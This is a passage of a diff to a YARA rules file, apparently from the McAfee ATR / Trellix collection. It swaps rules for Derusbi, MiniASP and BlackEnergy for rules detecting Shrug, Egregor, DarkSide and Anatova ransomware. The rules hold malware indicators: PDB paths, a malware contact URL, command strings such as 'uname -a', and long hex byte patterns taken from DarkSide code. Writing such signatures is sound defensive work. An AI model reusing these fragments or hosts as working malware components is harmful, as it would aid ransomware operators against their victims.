+		malware_family = "Ransom:W32/Shrug"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "__this_module"
-		$s2 = "init_module"
-		$s3 = "unhide_pid"
-		$s4 = "is_hidden_pid"
-		$s5 = "clear_hidden_pid"
-		$s6 = "hide_pid"
-		$s7 = "license"
-		$s8 = "description"
-		$s9 = "srcversion="
-		$s10 = "depends="
-		$s11 = "vermagic="
-		$s12 = "current_task"
-		$s13 = "sock_release"
-		$s14 = "module_layout"
-		$s15 = "init_uts_ns"
-		$s16 = "init_net"
-		$s17 = "init_task"
-		$s18 = "filp_open"
-		$s19 = "__netlink_kernel_create"
-		$s20 = "kfree_skb"
+		$s1 = "C:\\Users\\Gamer\\Desktop\\Shrug2\\ShrugTwo\\ShrugTwo\\obj\\Debug\\ShrugTwo.pdb" fullword ascii
+		$s2 = "http://tempacc11vl.000webhostapp.com/" fullword wide
+		$s3 = "Shortcut for @ShrugDecryptor@.exe" fullword wide
+		$s4 = "C:\\Users\\" fullword wide
+		$s5 = "http://clients3.google.com/generate_204" fullword wide
+		$s6 = "\\Desktop\\@ShrugDecryptor@.lnk" fullword wide
 
 	condition:
-		( uint32( 0 ) == 0x4464c457f ) and filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
 }
-rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Linux_Sharedmemcreation : BACKDOOR FILE
+
+rule TRELLIX_ARC_Ransom_Egregor : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Derusbi Linux Shared Memory creation"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "8d2db62e-22fa-5bbe-ab65-f294fc911b82"
-		date = "2017-05-31"
-		modified = "2020-08-14"
-		reference = "https://attack.mitre.org/software/S0021/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Derusbi.yar#L107-L130"
+		description = "Detect Egregor ransomware"
+		author = "Thomas Roccia | McAfee ATR team"
+		id = "b9f1a712-c168-5e0f-8b9e-cb03a6c43fc3"
+		date = "2020-10-28"
+		modified = "2020-10-28"
+		reference = "https://bazaar.abuse.ch/sample/004a2dc3ec7b98fa7fe6ae9c23a8b051ec30bcfcd2bc387c440c07ff5180fe9a/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_egregor.yar#L4-L31"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "095af979728f3b71e3192140306e4aa76011e07a25b20b0c5b3b98db41411714"
+		hash = "5f9fcbdf7ad86583eb2bbcaa5741d88a"
+		logic_hash = "8077c656eed0b1633da54f8d017d4eff122f2f4e486c4e1af6f6434ea33c0675"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:ELF/Derusbi"
+		malware_type = "ransomware"
+		malware_family = "Ransom/Egregor"
 		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		actor_group = "egregor"
 
 	strings:
-		$byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 }
+		$p1 = "ewdk.pdb" fullword ascii
+		$p2 = "testbuild.pdb" fullword ascii
+		$s1 = "M:\\" nocase ascii
+		$s2 = "1z1M9U9" fullword wide
+		$s3 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
 
 	condition:
-		( uint32( 0 ) == 0x464C457F ) and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and hash.sha256 ( pe.rich_signature.clear_data ) == "b030ed1a7ca222a0923a59f321be7e55b8d0fc24c1134df1ba775bcf0994c79c" or ( pe.sections [ 4 ] . name == ".gfids" and pe.sections [ 5 ] . name == ".00cfg" ) and ( any of ( $p* ) or 2 of ( $s* ) )
 }
-rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Linux_Strings : BACKDOOR FILE
+rule TRELLIX_ARC_RANSOM_Darkside : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect APT Derusbi Linux Strings"
+		description = "Rule to detect packed and unpacked samples of DarkSide"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "09e47580-9b20-5461-943e-32b932c36214"
-		date = "2017-05-31"
-		modified = "2020-08-14"
-		reference = "https://attack.mitre.org/software/S0021/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Derusbi.yar#L132-L173"
+		id = "ecbee92f-236a-5385-9566-502ef1c0aeda"
+		date = "2020-08-11"
+		modified = "2023-07-27"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Darkside.yar#L1-L23"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "0e95497c44a0c1d85936a6a072063720a771b7e1eb8da2377e54577e3fc2764e"
+		logic_hash = "be16d65911336809be103ea667167228e6445de85fd47ecd9ff8b3d91e056693"
 		score = 75
-		quality = 68
-		tags = "BACKDOOR, FILE"
+		quality = 70
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:ELF/Derusbi"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/DarkSide"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297"
 
 	strings:
-		$a1 = "loadso" wide ascii fullword
-		$a2 = "\nuname -a\n\n" wide ascii
-		$a3 = "/dev/shm/.x11.id" wide ascii
-		$a4 = "LxMain64" wide ascii nocase
-		$a5 = "# \\u@\\h:\\w \\$ " wide ascii
-		$b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide
-		$b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide
-		$b3 = "ret %d" wide fullword
-		$b4 = "uname -a\n\n" wide ascii
-		$b5 = "/proc/%u/cmdline" wide ascii
-		$b6 = "/proc/self/exe" wide ascii
-		$b7 = "cp -a %s %s" wide ascii
-		$c1 = "/dev/pts/4" wide ascii fullword
-		$c2 = "/tmp/1408.log" wide ascii fullword
+		$pattern_0 = { CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC558BEC5053515256570FEFC0660FEFC033DB8B7D088B450C33D2B910000000F7F185C0740B0F110783C7104885C075F585D27502EB5892B908000000F7F185C0740B0F7F0783C7084885C075F585D27502EB3B92B904000000F7F185C0740A891F83C7044885C075F685D27502EB1F92B902000000F7F185C0740B66891F83C7024885C075F585D27502EB02881F5F5E5A595B585DC20800558BEC5053515256578B750C8B7D088B451033D2B910000000F7F185C074110F10060F110783C61083C7104885C075EF85D27502EB6892B908000000F7F185C074110F6F060F7F0783C60883C7084885C075EF85D27502EB4592B904000000F7F185C0740F8B1E891F83C60483C7044885C075F185D27502EB2492B902000000F7F185C0740E66891F83C60283C7024885C075F285D27502EB048A1E881F5F5E5A595B585DC20C00558BEC53515256578B4D0C8B75088B7D1033C033DBAC8AD8C0E80480E30F3C0072063C09770204303C0A72063C0F7702045780FB00720880FB09770380C33080FB0A720880FB0F770380C35766AB8AC366AB4985C975BE6633C066AB5F5E5A595B5DC20C00558BEC53515256578B75088B7D0C55FCB2808A0683C601880783C701BB0200000002D275058A164612D273E602D275058A164612D2734F33C002D275058A164612D20F83DB00000002D275058A164612D213C002D275058A164612D213C002D275058A164612D213C002D275058A164612D213C074068BDF2BD88A03880747BB02000000EB9BB80100000002D275058A164612D213C002D275058A164612D272EA2BC3BB010000007528B90100000002D275058A164612D213C902D275058A164612D272EA568BF72BF5F3A45EE94FFFFFFF48C1E0088A06468BE8B90100000002D275058A164612D213C902D275058A164612D272EA3D007D000083D9FF3D0005000083D9FF3D8000000083D1003D8000000083D100568BF72BF0F3A45EE9FEFEFFFF8A064633C9C0E801741783D1028BE8568BF72BF0F3A45EBB01000000E9DDFEFFFF5D2B7D0C8BC75F5E5A595B5DC20800558BEC53515256578B7D088B450CB9FF00000033D2F7F185C074188BD868FF00000057E8AD00000081C7FF0000004B85DB75EA85D274075257E8970000005F5E5A595B5DC20800558BEC5351525657B9F0000000BEB2B640008B45088B108B58048B78088B400C89540E0C89440E08895C0E04893C0E81EA101010102D1010101081EB1010101081EF1010101083E91079D533D233C98B750C33DB8B7D108A81B2B6400002141E02D08AA2B2B64000438882B2B6400088A1B2B640003BDF7306FEC175DAEB0633DBFEC175D25F5E5A595B5DC20C00558BEC535152565733C0A3C2B84000A3C6B84000B9400000008D35B2B640008D3DB2B74000F3A58B7D088B15C2B840008B4D0C8B1DC6B840004F33C0029AB3B740008A82B3B740008AABB2B740008883B2B7400088AAB3B7400002C5478A80B2B74000FEC23007FEC975D18915C2B84000891DC6B840005F5E5A595B5DC2080053515256578D35047040008D3DCAB84000FF76FC56E891FEFFFF56E8864500008BD8FF76FC56E888FBFFFF8B46FC8D3406B915000000E85C010000AD5056E868FEFFFF56E85D4500008BD8FF76FC56E85FFBFFFF8B46FC8D3406B93D000000E833010000AD5056E83FFEFFFF5256E8334500008BD85AFF76FC56E834FBFFFF8B46FC8D3406B915000000E808010000AD5056E814FEFFFF5256E8084500008BD85AFF76FC56E809FBFFFF8B46FC8D3406B904000000E8DD000000AD5056E8E9FDFFFF5256E8DD4400008BD85AFF76FC56E8DEFAFFFF8B46FC8D3406B906000000E8B2000000AD5056E8BEFDFFFF5256E8B24400008BD85AFF76FC56E8B3FAFFFF8B46FC8D3406B901000000E887000000AD5056E893FDFFFF5256E8874400008BD85AFF76FC56E888FAFFFF8B46FC8D3406B903000000E85C000000AD5056E868FDFFFF5256E85C4400008BD85AFF76FC56E85DFAFFFF8B46FC8D3406B901000000E831000000AD5056E83DFDFFFF5256E8314400008BD85AFF76FC56E832FAFFFF8B46FC8D3406B902000000E8060000005F5E5A595BC3ADFF76FC56E80AFDFFFF515653E8F743000059ABFF76FC56E8FFF9FFFF8B46FC8D34064985C975D8C3558BEC81EC1401000053515256578D85ECFEFFFF50FF1516B940008BB5F0FEFFFF8BBDF4FEFFFF83FE05750583FF01720583FE057313B8000000005F5E5A595B8BE55DC3E9DA00000083FE05751883FF017513B8330000005F5E5A595B8BE55DC3E9BD00000083FE05751883FF027513B8340000005F5E5A595B8BE55DC3E9A000000083FE06751785FF7513B83C0000005F5E5A595B8BE55DC3E98400000083FE06751583FF017510B83D0000005F5E5A595B8BE55DC3EB6A83FE06751583FF027510B83E0000005F5E5A595B8BE55DC3EB5083FE06751583FF037510B83F0000005F5E5A595B8BE55DC3EB3683FE0A751485FF7510B8640000005F5E5A595B8BE55DC3EB1D83FE0A750583FF00770583FE0A760EB8FFFFFF7F5F5E5A595B8BE55DC3B8FFFFFFFF5F5E5A595B8BE55DC3558BEC83C4F853515256576A0068800000006A026A006A006800000040FF7508FF1526B940008945FC837DFCFF74226A008D45F850FF7510FF750CFF75FCFF1536B9400085C07409FF75FCFF153EB940005F5E5A595B8BE55DC20C008BFF558BEC5351525657837D0C0074728D3DAABA4000837D100075086A1057E842F8FFFFFF750CFF750868EFBEADDEFF15F6B84000FF750CFF750850FF15F6B840003107FF750CFF750850FF15F6B84000314704FF750CFF750850FF15F6B84000314708FF750CFF750850FF15F6B8400031470CB8AABA40005F5E5A595B5DC20C00B8000000005F5E5A595B5DC20C00558BEC5351525657FF7508FF15DEB8400083C4048BD88D045D02000000506A00FF35AEB64000FF15BEB940008BF085F67434FF750856FF15CEB8400083C4088D43016A006A0050FF75086AFF566A006A00FF1506BA4000566A00FF35AEB64000FF15C6B940008BC35F5E5A595B5DC2040053515657833DBABA400000750B68BABA4000FF15F2B8400068BABA4000FF15F2B840008BD15F5E595BC3558BEC5351525657BB080000008B7508E8C1FFFFFF83FB05750433C033D28944DEFC8954DEF84B85DB75E55F5E5A595B5DC204008D4000558BEC81EC0001000053515256578D45B083C00F83E0F089850CFFFFFF8D8560FFFFFF83C00F83E0F0898508FFFFFF8D8510FFFFFF83C00F83E0F0898504FFFFFF837D14000F84750300008BB504FFFFFF0F57C00F11060F1146100F1146200F1146308B75088BBD0CFFFFFF0F10060F104E100F1056200F105E300F11070F114F100F1157200F115F30837D1440732A8B4510898500FFFFFF8B9504FFFFFF8BFA8B750C8B4D148A440EFF88440FFF4985C975F389550C8955108BB50CFFFFFF8BBD08FFFFFF0F10060F104E100F1056200F105E300F11070F114F100F1157200F115F305556BD0A0000008B078B5F108B4F208B57308BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C68907895F10894F208957308B47148B5F248B4F348B57048BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C6894714895F24894F348957048B47288B5F388B4F088B57188BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C6894728895F38894F088957188B473C8B5F0C8B4F1C8B572C8BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C689473C }
+		$pattern_1 = { 70211F3B6E97C50000473D000000A000004602003EBBFF1F92CC558BEC5053515256570FEFC0660333DBFBFFEDFF8B7D088B450C33D2B9100000F7F185C0740B0F110783C710480A692EFB7F75F585D27502EB5892B9081C7F08B60F592E3B040A891F38049B641979F61F02661CD6FEBFEC023802881F5F5E5A595B585DC25D977E20634F8B750C9110110F1006252383FD94C61097EF6819AC59BA226F7F089DEFD8EE0119450F8B1E82C604A23E033232F1240EC602B9EC91C1A5F2048A1EA70CA12CCBD9A64D757D42E9FEFFBFAC8AD8C0E80480E30F3C0072063C09770204303C0A090FB66F6DBB5780FB140804150380C3300C0ADADFFE790F5766AB8AC3034985C975BE6646FF252CD6096564610C55FCB2806FDF86DB8A069701887801BBAD0299058A164FD62EFB4612D273E60A4F430C0F83DB7F2A7B602613C00A74068BDF2BD821EC63DB8A03644762EB9BB80142900BFBFB72EA2BC3BB1C7528B923C96F7FFB1F568BF72BF5F3A45EE94D01D248C1E008C3468BE8DE1EC26E0C0449303D007D4B83D9FF0DD93CD907058000D100BDB01BF250F04C33C974017417B1D8B0B61902561B96204B06E1C25D2B398BC75208111AEE18EDB9FF2660F4F8EFDDF7188BD8680E579B03D981C70B4B85DB75EAEE94CD5EFE7407521546B9F0256F7F6BB7BE02A6B24D50108B58048B7807400C895FF7FFDB540E03440E08895C0E04893C0E81EA10002D048168ED9FB1EB05EF83E91079D57EC0DFFFFDE4EC80108A814A02141E02D08AA20A436BFFBFDF88820688A1053BDF7306FEC175DAEB062C076E0B29A3D227F8A327A8C27DFBEDFE04C6B940998D35378D3D05A7B2F3A57DBC8FF7F31520B41D242A9A1BFB8DDD1CB38A8205AB28888305AA11D88DFFFE02C5478A800EFEC23007FEA0D189402F9684D8893D0D7C6BF07BF8CF6004A8CAFF76FC5630040549FF33FFDBAC59109C0C8B46FC8D3406B9150F477291BD05F0AD50283D52C252D961295A532A02B902BB04550608B902B90103E10843260299C3AD8615B2BF2751565333F959AB329FE0EEF874D8C33F81EC1468C885ECFE7777DFF0FFFF50FF4FA9168BB5F00C8BBDF40583FE055877F74BA483FF017205097313B86D00695BF36DFA8BE55DC36C073C2118751C3300D21C210234DF04D2FD06751785FF1B3C1555109AC11EC8B83DEB6A19023EA419644250033FC866DE2636690A75141864FECDEE4C1DDE00770A760EB8FFFFFF7F1B927C490DFF3083C4AEFD7A84F82D6A0068976A02080AFE8FB07509405A083B268945FC837DFCFF7422916D73DF188D45F85072020C1DFC34ECB0AE3672090C3E59746B43DACC8BFFCE3C0D7472E1AD44FB51AAAA0B04576A1057BC67BF3F16470868EFBEADDE3FA8F6105090BDB0670C31070E47040F92F50EC9080CB8624E071B5913D85CD6A8DE6D1FDF6AF9E4D88D045D6D50DAFF58F78F7D63AEC6BE8BF085F6743429562ADDDCE1CBCE088D430119FDBDFF56B027ECEF0A1AAA065639C68BC37077FB9C630484FAF4BAF10B6807A31DB0B14CF20A8BD12DE09A3871989ABBFD24E84013CB376608A783FB048DD2D90317B87FDEFC87DEF8C4E55D49C628308D17EE000DC32FF145B083C027E0F089850CE3FD202387B960051108102B99FE37040B7D14000F8475C41E0FA6DBC5F60F571C119846100320ED17EF8930B1BD4EB0104E17D32CDBCB1056105E3026074F57CDE6E26E5F304840732AE457008B6FF017BF954D8BFAFB4D148A3FFF88447B6DFBD30FFFA3F389550C02106E5359FDF0A964085556BD0A14078B5F6FFFDFBE354F208B5792F003F2C1C60733DE8BF303F0080933CEED2FFFF28BF103F30D33D68BF203F11233C68907892ECBB26D96898947143A243404CBD612202F3B24342CCBB22C0428380818CBB25C802838081820CBB22C3C0C1C2CDFB22C173C0C1C2CED0463476063760CED04750C53606363ED187510ED18D80863637510ED2C6424ED3036C2142C6524ED30234C818D6538ED3065386DA30DFC4D85ED0F851B975E5DF30702CBE5726BC80357105F1867206FB6022F972877307F380F0C024EE572B9DC1EFE56FE5EFE66FE6EA6D996CBFE76FE7E7F3D7F7F94A6699A7F7F7F7F7F9AE5C8708D6B5757575D8C966B57BED8FE2011BFE4B834118B9DA7274320837B2086F1B195000824E977EF1866C335DB32C500E4B2BD154E8B55BA338942200524B5655BFA24EB16831940030C6D370297C0237485CAFC86C21297EE1A818880308D7D80F3B920B16FE21DF2F3ABB900DF518D7580F810CD33E7FED1168D7604E2F92175128B06194DA6ECED078D7F17F473181911C9600933C441290CD5BB0A5B5B59F033E476B05505E00CEDAA9BBDB266E03AA5D908A6BFB960DDDFFCDD4FE0C64580018BA98F7EF05D0C81C379B981A849B1BE07D84150F8510851FC8DAB8360115F547B8D626FADBB1D508D3B50E874D3815240D3E0BF6563F02203740F9908199BBB4B1961646306AE9B780C830627307DC7E63041B73BDB06F8410ECB8A369391B8D51A68A41F000B8278E2C406CE1F0926023676729008AA12F80C1A24446B4B22170E54206317F226F8C37EF45B18B8C3F8EF238B71C65E4E62F475F8F46A0514066C737F01CE04EB43EB3F3D310A1B1CB5D84CD837C2EBC60D2C5A839117A1C12C4468F7BBA5196AD2C86AD6616CDBD8288E2E33ED3CAD1D14C3999178FF733C02CA74D72E71A1A14402EBFC1C332275D4565858CA5D4F846D35570F06E6AC62895FE9BF454B183B480875278D1F30AABEC220586C3BEA0F2C3A0E186BD5E850C63826070017E40793C5F30C0262CC0D776B110D6F68081017F4FDDD58B2C77568040110976256A3D8B3C4B2CC11D3D23DE2DB4636F677FC57FB571F34102048BC03A1088DA3ADD5456CD8C2BE227A30C3A3B18D922A9B1C2C6A9BDB095B62106E38E18B5E12C37BD86CB0403753132F6E56A573B367B10FBC59A8EE97CD409E848530675464A1183064849F924030C31A2C72E1248313F88D1DCF6C125B166CECFC53EC531BB519E4027936286BC0D263936C0F6A245FD4C70B24B15766738C09E89B4A2C585392A89C53325426816407AA7E5111040C8D9913E810EF52A937B527344930AA660C5E017648727CC960E3F07304ADA50B27ACDB8F2D60F0B5833EAF15107A641F05D019EBCCCBACDD2578763D4FA9744A4A0FFC0618E9E3147A6517C1293AECB517D9F88B122E0146336C2CD67D7C5224760B1D0E08506FC8096E7ACA96504FB6B1B1463FD3A6521911F424E1FC5A0142A91AD9A722EC3EEE6B18B26B1C3D7DB1D75EAFFC8D7531831C8535BF8E68EB803FAA5219367958D984534FBE3C1B690664B0B03CCC09209966A401B44050C83336C9ECA29D0004D88465B109215A244576CF58C96AF0346AF4AE9D3DB360BC0E3989C005A9247508F153A7A564036F644553F675A3D4253BAC3956120C5AEBE66EC682D922722568F4C058B36FD730DAEDB57D14450DAA0BD716168151969EAE69921D76C8D85E08626E130C9C11C00D07C160C7846481EDFF72C8A1BDE3DF9F813C18DEADBEEF980340EBF2C631F9EC4E04136DA456A4A1FC8EAC7E73C8C1E0068BD82373CCBB46C6DE01B16A1630408086A44CB2810B2C2F3616500A17F3DE5F0BAB8EAEA556561FFBE5B2F6150A374D358D83E6070A67B303593A5A56223D5A89E4C8254EB60FE492B3D95E56223D5E4FD9EC447286176256223D223972C96250561FB9E46C766656223D6641363B911C26276A56223D488E5C726A51F62E72362B90C7223D6E9D488E5C52C6367256472E399B223D724B963E9CCD4E247656223D7627922397537E427A56964BCE66223D7A545890672269727E72CCA759E47E0AC8A912678203C11A01B23557FBC2E08A53D968243106BE91ACB86472A8C319698152773D833C038C907C420BB3345B061008091C095EE251887010EBDE251B5A160CE0FD66B80904A10B9566ABE74C161266A4D19EE614ECA72DE3F8DC0F84A129461DF421D89E3DE828139F83DA062D4FEEF350ECD3AEFCF6EB6399F833D285D255B390DB6BFDC90530940107A842EB14BB162E2CC12B8B1BD4CB4D33C9192BFFAE400830040E4183F9080E04AC5F713904576A57014C7042E2C8681122C63664F381D8ED9E70B470B8182C883DA58E0EFFE62C080B5B180C256C469348D2C1B408AC1CEC840704300A44AA0EBBB6044381DC0C4BA62EEA1D487CDA4AE10E58D4DC194871F43A5F5DB37064FBF086F034798B83C9A26B096057B0571E7F83172666FD47FE5CFA66C704475C00D565F15702444702D9EB3D62598B151A11EA0B3531B614F06592BA0E46348A5D3932DAC81B1A386C90410C03802C26E0B1CCCD19502B1B035C4379AA3ACD09D534968523BBEB6953CCECBFEC511DB68B27C8F4CB75EC39326FD94ED2820BEB1E27F41821E12E7548293B02750759AC12C23B9616FF57C6082997A5EC1C846C4EC80C6D026D0630968DE46D06251CA43358A41AF84F9CD06CEBA91B5C107EDA562CE1F7C049A5AE83702B0CCB523367A364CD46000B08DD35AD8C91877A08E63C5798CC25C3AC9C86AD927DC615A3A3DC53E7CA217946B6431A1010E864489E911414F0183891906718F8A44D6148561EEBA0D3363ACC9DD08BC8C45110BA36D092BA42CE140510960626A37C49D0736C658C67F0524156E89E609103 }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and filesize < 200KB and ( ( 1 of ( $a* ) and 4 of ( $b* ) ) or ( 1 of ( $a* ) and 1 of ( $c* ) ) or 2 of ( $a* ) or all of ( $b* ) )
+		$pattern_0 or $pattern_1 and filesize < 5831344
 }
-rule TRELLIX_ARC_Apt_Miniasp_Pdb : TROJAN FILE
+rule TRELLIX_ARC_RANSOM_Darkside_DLL_May2021 : RANSOM FILE
 {
 	meta:
-		description = "Rule to detect MiniASP based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "2e7e2990-5e7f-52b0-884a-fcb54b2f5488"
-		date = "2012-07-12"
-		modified = "2020-08-14"
-		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_MiniASP_pdb.yar#L1-L26"
+		description = "Rule to detect Darkside Ransomware as a DLL"
+		author = "TS @ McAfee ATR"
+		id = "e9d64637-dc8f-5650-81e1-34e27e6ee912"
+		date = "2021-05-14"
+		modified = "2023-07-27"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Darkside.yar#L26-L47"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "42334f2119069b8c0ececfb14a7030e480b5d18ca1cc35f1ceaee847bc040e53"
-		logic_hash = "8ee6f93aaae2c48cc5835269fd526371040cd33cc309220f92a150444ba21055"
+		hash = "f587adbd83ff3f4d2985453cd45c7ab1"
+		logic_hash = "39930b6f352642647ea6b80f941201b93d6a9defd42cb75f9e4f7239ff17a4ec"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "RANSOM, FILE"
+		rule_type = "Public"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/MiniASP"
-		actor_type = "Apt"
-		actor_group = "Unknown"
+		malware_type = "Ransom"
 
 	strings:
-		$pdb = "\\Project\\mm\\Wininet\\Attack\\MiniAsp4\\Release\\MiniAsp.pdb"
-		$pdb1 = "\\XiaoME\\AiH\\20120410\\Attack\\MiniAsp3\\Release\\MiniAsp.pdb"
+		$s1 = "encryptor2.dll" wide ascii
+		$s2 = "DisableThreadLibraryCalls" wide ascii
+		$s3 = "KERNEL32.dll" wide ascii
+		$pattern1 = {D24DC8855EDD487B3CD2D545F11031E1FA85C2F2440712445F67D105B326533A77BA75B3383A98CE97EAA2B95798DCFA6B75B5573662F9ED5DC9B7D2E582FD94104E210F3EA62A1826B26B952FFBD5A70A97E6EC3D14794577A2980A0ED1EE02CA291623DD3721A7E68223EDA56F9E1325FE36E191D5C41F7227D55EDC3D5B9359C819}
+		$pattern2 = {87FC982E066F585B73D417C0D5F75B86B9F9F8286B4CC42BB2053912D595A68C07C0EDD0159AC785880C5483E246D3501F6523D05078B9B7510711423948D4CB367C83C0833BD04AD6DC655E1BEEA38770470BB48B6EBA70944E952526E4D87A03BAA485D7B4DA1318A00EF07FA76C0D}
+		$pattern3 = {1B6F099F1C3C62BBF5543FA03B919C7BF5E477D256CE79D98C55ACE8D69CDC9373B2F0A2B51414776D5226B74BF9A7CB935C9DD04BCFC19FC81418F7A39244A730697E1BC05418BF41DE50E4C8609533591CE80617D476E686B36CF2AE914CB3AFD720A33C0D5DE438F1CD0B}
+		$pattern4 = {5060E373F1D3B3BB8D15C851BBFC73F60390681C488F7C0B80FC2EDBC1ED88CEA82014B9223A70EA0BB7DD0D2560A29D39381FEE7B73AE22683AE05C369918F8C5772678A9F29CEF65854238D1C2B762CC12706637154F57A9}
+		$pattern5 = {EE452560DBD5A4F46FB562C9C707C8D014BB8F1C18E4467E249F5AC69A87954F5B69650B7A759CE2DD075E99CBCBA37A9C5A0650EDF06285F8F990AF6B94FBA08E3C0B2EBDE3C155ECDB06C30F95D76695}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and any of them
+		filesize >= 45KB and filesize <= 70KB and all of ( $s* ) and 4 of ( $pattern* )
 }
-rule TRELLIX_ARC_Apt_Blackenergy_Pdb : TROJAN FILE
+rule TRELLIX_ARC_Anatova_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the BlackEnergy trojan"
+		description = "Rule to detect the Anatova Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "55c96b66-a8bf-5390-a75a-f3d2441c2a55"
-		date = "2013-02-15"
+		id = "6e3205aa-42e4-5449-877e-37494cdd096b"
+		date = "2019-01-22"
 		modified = "2020-08-14"
-		reference = "https://www.kaspersky.com.au/resource-center/threats/blackenergy"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_blackenergy_pdb.yar#L1-L38"
+		reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Anatova.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "4b2efcda5269f4b80dc417a2b01332185f2fafabd8ba7114fa0306baaab5a72d"
-		logic_hash = "7bb85d03d8f2a4d91554f7fea96e9bbe36b153cfa4a91fd13fb99d41d430c9e9"
+		hash = "97fb79ca6fc5d24384bf5ae3d01bf5e77f1d2c0716968681e79c097a7d95fb93"
+		logic_hash = "4fce15ad0ef2d3cb39f6092677f117308f847815cb2a5a491290a1f9d09776df"
 		score = 75
-		quality = 70
-		tags = "TROJAN, FILE"
+		quality = 45
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/BlackEngergy"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Anatova"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "msiexec.exe /i \"%s\" %s REBOOT=\"ReallySuppress\"" fullword wide
-		$s2 = "InstallUpdate: CreateProcess failed, Cmdline=%s Error=%d ." fullword wide
-		$s3 = "Portuguese=Instalando o Tempo de Execu" fullword wide
-		$s4 = "Initialization: Failed to initialize - Unable to get Upgrade Code." fullword wide
-		$s5 = "This version of Internet Explorer is not supported.  You should upgrade Internet Explorer to version %s and run setup again.  Se" wide
-		$s6 = "Initialization: Failed to open %s file, Make sure the file is not used by another process." fullword wide
-		$s7 = "o %s e execute a configura" fullword wide
-		$s8 = "Initialization: Failed to initialize - Unable to get Product Version." fullword wide
-		$s9 = "f:\\CB\\11X_Security\\Acrobat\\Installers\\BootStrapExe_Small\\Release\\Setup.pdb" fullword ascii
-		$s10 = "BootStrap.log" fullword wide
-		$s11 = "ACDownloaderDlg" fullword ascii
-		$s12 = "Initialization: Failed to initialize Product - msi key not specified." fullword wide
-		$s13 = "rio atualizar para o Service Pack %s e executar a instala" fullword wide
-		$s14 = "\\Msi.dll" fullword wide
+		$regex = /anatova[0-9]@tutanota.com/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $regex
 }
-rule TRELLIX_ARC_Apt_Babar_Malware : BACKDOOR FILE
+rule TRELLIX_ARC_Jeff_Dev_Ransomware : RANSOMWARE FILE
 {
 	meta:
